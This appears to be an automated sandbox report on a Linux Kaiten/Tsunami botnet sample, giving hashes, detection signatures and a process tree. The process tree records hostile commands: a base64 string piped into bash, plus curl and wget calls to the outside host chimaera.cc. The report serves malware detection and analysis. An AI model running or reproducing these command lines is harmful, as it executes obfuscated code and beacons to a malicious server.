Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240226-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu1804-amd64-20240226-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    15-04-2024 07:52

General

  • Target

    f09c0d5883a221d2e5f762480e946a78_JaffaCakes118

  • Size

    42KB

  • MD5

    f09c0d5883a221d2e5f762480e946a78

  • SHA1

    506386147d393cef81019dda55ac85125914c6be

  • SHA256

    0eb2c98d14fce41db0ac9352484438fc40489d6f40c915b659ecc84342aa83a6

  • SHA512

    a7c13cbb7855172fcb6fea29da30ff256664fc9515fc25019579d9db1344014804316e43e919e95b6110b77d4023a340639b8cdb63b4a6022437316320793c20

  • SSDEEP

    768:oZHhN4I6FWJosiC8bOi6c9rasu7upif9EIgXEB2QeXeoIz8Vj2zc3pTJBXG1wzq:+L4I6zdAi6c94SIgUBVeXO8Azc3pjSw+

Score
10/10

Malware Config

Signatures

  • Detects Kaiten/Tsunami Payload 1 IoCs
  • Detects Kaiten/Tsunami payload 1 IoCs
  • Kaiten/Tsunami

    Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.

  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/f09c0d5883a221d2e5f762480e946a78_JaffaCakes118
    /tmp/f09c0d5883a221d2e5f762480e946a78_JaffaCakes118
    1⤵
    • Reads runtime system information
    PID:1539
    • /bin/sh
      sh -c "echo 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 | base64 -d | bash"
      2⤵
      PID:1540
      • /bin/bash
        bash
        3⤵
        PID:1543
        • /usr/bin/curl
          curl -sLk http://chimaera.cc/log/inf.php -o /dev/null
          4⤵
          PID:1544
        • /usr/bin/clear
          clear
          4⤵
          PID:1553
      • /usr/bin/base64
        base64 -d
        3⤵
        PID:1542
    • /bin/sh
      sh -c "wget -q -O /dev/null http://chimaera.cc/log/inf.php || curl -s -o /dev/null http://chimaera.cc/log/inf.php"
      2⤵
      PID:1554
      • /usr/bin/wget
        wget -q -O /dev/null http://chimaera.cc/log/inf.php
        3⤵
        PID:1555
      • /usr/bin/curl
        curl -s -o /dev/null http://chimaera.cc/log/inf.php
        3⤵
        PID:1559

Network

MITRE ATT&CK Matrix

Downloads